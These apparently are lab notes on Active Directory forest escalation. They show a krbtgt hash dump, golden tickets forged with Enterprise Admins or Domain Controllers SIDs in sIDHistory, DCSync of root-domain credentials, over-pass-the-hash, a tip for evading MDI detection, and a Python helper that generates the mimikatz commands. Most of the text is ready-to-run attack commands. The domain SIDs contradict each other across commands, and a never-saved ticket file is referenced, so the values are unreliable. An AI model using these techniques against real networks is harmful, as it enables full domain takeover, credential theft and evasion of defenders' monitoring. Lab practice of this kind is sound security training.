Using KRBTGT Hash
We abuse sIDHistory again. First, we dump the credentials on dcorp-dc to obtain the krbtgt hash of the current (child) domain, dollarcorp.moneycorp.local:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
With that hash we can forge a golden ticket (a TGT for dollarcorp) for Administrator that carries the forest root's Enterprise Admins SID in its sIDHistory, and inject it:
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
In the above command, /sid is the SID of the current domain (dollarcorp.moneycorp.local), whose krbtgt hash signs the ticket, and the mimikatz option /sids forcibly sets the sIDHistory of the forged ticket to S-1-5-21-335606122-960912869-3279953914-519, which is the Enterprise Admins group (RID 519) of moneycorp.local, the forest root.
We can now access mcorp-dc:
winrs -r:mcorp-dc.moneycorp.local cmd
On any machine of the current domain, inject the saved ticket (krbtgt_tkt.kirbi):
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
We can now run commands on the remote machine:
ls \\mcorp-dc.moneycorp.local\c$
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
If you can't get a shell on the remote system with winrs (you get an error like the one in the screenshot below), here is how to get a shell anyway 🤟 (DCSync):

Using the injected ticket, run a DCSync attack against the forest root to dump the credentials of the root domain's Administrator (note that the command targets mcorp\administrator, not krbtgt):
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"
Now use over-pass-the-hash with the AES256 key obtained from DCSync to start a process as the Administrator of moneycorp.local; /dc points the TGT request at the domain controller of that domain (mcorp-dc.moneycorp.local):
C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
You should now have a new process running as the Domain Administrator of moneycorp.local; run the winrs command again from that process and you should have shell access:
winrs -r:mcorp-dc cmd

Avoid suspicious logs by using the Domain Controllers group instead of Enterprise Admins (bypasses MDI detection). Note: /user:dcorp-dc$ used to work earlier (until April 2023), but now we need to use /user:Administrator.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
With that ticket injected, DCSync the krbtgt of the forest root:
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
SIDs used above:
S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers (RID 516 of the forest root domain)
S-1-5-9 - Enterprise Domain Controllers (well-known SID)
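The two golden-ticket commands on this page differ only in which SIDs are placed in the ticket's PAC ExtraSids (what the notes call sIDHistory). The following Python is an added example, not part of the original notes and not code from mimikatz or Rubeus: it does the SID arithmetic explicitly, names the well-known RIDs, rejects the common mistake of stamping RID 519 onto the child domain's own SID (Enterprise Admins exists only in the forest root, so such a SID is meaningless to the root DC), and emits the mimikatz argument strings for both variants. `GoldenTicketSpec`, `parse_sid`, `describe_sid` and the two `*_variant` helpers are my own names; the domain SIDs and the krbtgt hash are the ones from the commands above.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Well-known RIDs relevant to sIDHistory abuse (documented Windows values).
WELL_KNOWN_RIDS = {
    500: "Administrator",
    502: "krbtgt",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
# Well-known SIDs that have no domain part.
WELL_KNOWN_SIDS = {"S-1-5-9": "Enterprise Domain Controllers"}

_DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}$")
_SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")


def parse_sid(sid: str) -> Tuple[str, Optional[int]]:
    """Split a SID into (domain SID, RID); well-known SIDs such as S-1-5-9
    return (sid, None)."""
    if not _SID_RE.match(sid):
        raise ValueError(f"not a SID: {sid!r}")
    if sid in WELL_KNOWN_SIDS:
        return sid, None
    domain, _, rid = sid.rpartition("-")
    if not _DOMAIN_SID_RE.match(domain):
        raise ValueError(f"not a domain-relative SID: {sid!r}")
    return domain, int(rid)


def describe_sid(sid: str) -> str:
    """Human-readable name, e.g. 'Enterprise Admins of S-1-5-21-...'."""
    domain, rid = parse_sid(sid)
    if rid is None:
        return WELL_KNOWN_SIDS[sid]
    name = WELL_KNOWN_RIDS.get(rid) or f"RID {rid}"
    return f"{name} of {domain}"


@dataclass(frozen=True)
class GoldenTicketSpec:
    """Inputs of a mimikatz kerberos::golden command (hypothetical helper)."""
    user: str
    domain: str                  # domain whose krbtgt key signs the ticket (/domain)
    domain_sid: str              # that domain's SID (/sid)
    krbtgt_hash: str             # NT hash of its krbtgt account (/krbtgt)
    extra_sids: Tuple[str, ...]  # PAC ExtraSids, i.e. the forged sIDHistory (/sids)
    groups: Optional[Tuple[int, ...]] = None  # /groups; None keeps mimikatz defaults

    def validate(self) -> None:
        if not _DOMAIN_SID_RE.match(self.domain_sid):
            raise ValueError(f"/sid must be a domain SID: {self.domain_sid!r}")
        if not re.fullmatch(r"[0-9a-fA-F]{32}", self.krbtgt_hash):
            raise ValueError("/krbtgt must be a 32-hex-character NT hash")
        for sid in self.extra_sids:
            domain, rid = parse_sid(sid)
            # Enterprise Admins (519) and Schema Admins (518) exist only in the
            # forest root: RID 519 under the child's own domain SID is just an
            # unknown RID, not EA, and buys nothing at the root DC.
            if rid in (518, 519) and domain == self.domain_sid:
                raise ValueError(f"{sid}: RID {rid} must be built from the "
                                 "forest-root domain SID, not the current domain's")

    def mimikatz_args(self) -> str:
        """Argument string in the form used in the commands on this page."""
        self.validate()
        parts = ["kerberos::golden", f"/user:{self.user}",
                 f"/domain:{self.domain}", f"/sid:{self.domain_sid}"]
        if self.groups is not None:
            parts.append("/groups:" + ",".join(str(g) for g in self.groups))
        parts += [f"/sids:{','.join(self.extra_sids)}",
                  f"/krbtgt:{self.krbtgt_hash}", "/ptt"]
        return " ".join(parts)


def enterprise_admins_variant(child_domain: str, child_sid: str, root_sid: str,
                              krbtgt_hash: str, user: str = "Administrator") -> GoldenTicketSpec:
    """First variant on the page: forest-root Enterprise Admins (RID 519) in sIDHistory."""
    return GoldenTicketSpec(user, child_domain, child_sid, krbtgt_hash, (f"{root_sid}-519",))


def domain_controllers_variant(child_domain: str, child_sid: str, root_sid: str,
                               krbtgt_hash: str, user: str = "Administrator") -> GoldenTicketSpec:
    """Second variant: forest-root Domain Controllers (516) plus Enterprise Domain
    Controllers (S-1-5-9), with /groups:516, so the ticket looks like a DC's."""
    return GoldenTicketSpec(user, child_domain, child_sid, krbtgt_hash,
                            (f"{root_sid}-516", "S-1-5-9"), groups=(516,))


if __name__ == "__main__":
    # Values taken from the commands on this page.
    KRBTGT = "4e9815869d2090ccfca61c1fe0d23986"
    ea = enterprise_admins_variant("dollarcorp.moneycorp.local",
                                   "S-1-5-21-719815819-3726368948-3917688648",
                                   "S-1-5-21-335606122-960912869-3279953914", KRBTGT)
    dc = domain_controllers_variant("dollarcorp.moneycorp.local",
                                    "S-1-5-21-1874506631-3219952063-538504511",
                                    "S-1-5-21-280534878-1496970234-700767426", KRBTGT)
    for spec in (ea, dc):
        print(spec.mimikatz_args())
        for sid in spec.extra_sids:
            print("   sIDHistory ->", describe_sid(sid))
```

The root domain SID is never shown on its own in the notes; it is recovered by stripping the trailing RID from the /sids value, which is exactly what `parse_sid` does. The validation step is the check worth keeping: a ticket whose ExtraSids point at RIDs under the wrong domain SID injects fine and even passes `klist`, but fails silently at the root DC.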